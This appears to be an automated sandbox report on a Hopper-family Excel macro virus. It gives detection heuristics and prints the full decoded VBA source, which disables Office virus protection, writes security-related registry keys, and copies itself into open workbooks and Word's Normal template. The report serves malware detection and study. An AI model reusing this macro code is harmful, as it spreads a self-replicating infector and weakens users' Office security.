Malware Insights
The sample is a malicious Excel document containing VBA macros. The macros utilize `WScript.Shell` and `CreateObject` to write registry keys, indicating an attempt to establish persistence. The `Workbook_Deactivate` subroutine explicitly writes to `HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6` and `HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6`. The presence of `Shell()` calls and `WScript.Shell` usage strongly suggests the execution of arbitrary commands or the download of further malicious content.
Heuristics 6
-
ClamAV: Doc.Trojan.Hopper-9 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hopper-9
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next Set WSHshell = CreateObject("WScript.Shell") WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next Set WSHshell = CreateObject("WScript.Shell") WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2957 bytes |
SHA-256: 4c9ef587beae8bc9fc576298e3d9886d265d47a336ee948747ef198027b1ebed |
|||
|
Detection
ClamAV:
Doc.Trojan.Hopper-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
Private Sub Document_Close()
On Error Resume Next
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
For i = 1 To 19
NT.InsertLines i, AD.Lines(i, 1)
Next
End If
If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
For i = 1 To 19
AD.InsertLines i, NT.Lines(i, 1)
Next
End If
End Sub
'Ex-cell v0.1 /1nternal
Private Sub Workbook_Deactivate()
On Error Resume Next
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
WSHshell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel\Options6", 0, "REG_DWORD"
For i = 1 To Workbooks.Count
If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
For y = 1 To 45
Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
Next
End If
Next
Set WordObj = CreateObject("Word.Application")
Set NT = WordObj.Templates(1).VBProject.VBComponents(1).CodeModule
If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
For i = 1 To 19
NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
Next
End If
Set NT = Nothing
WordObj.Quit
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.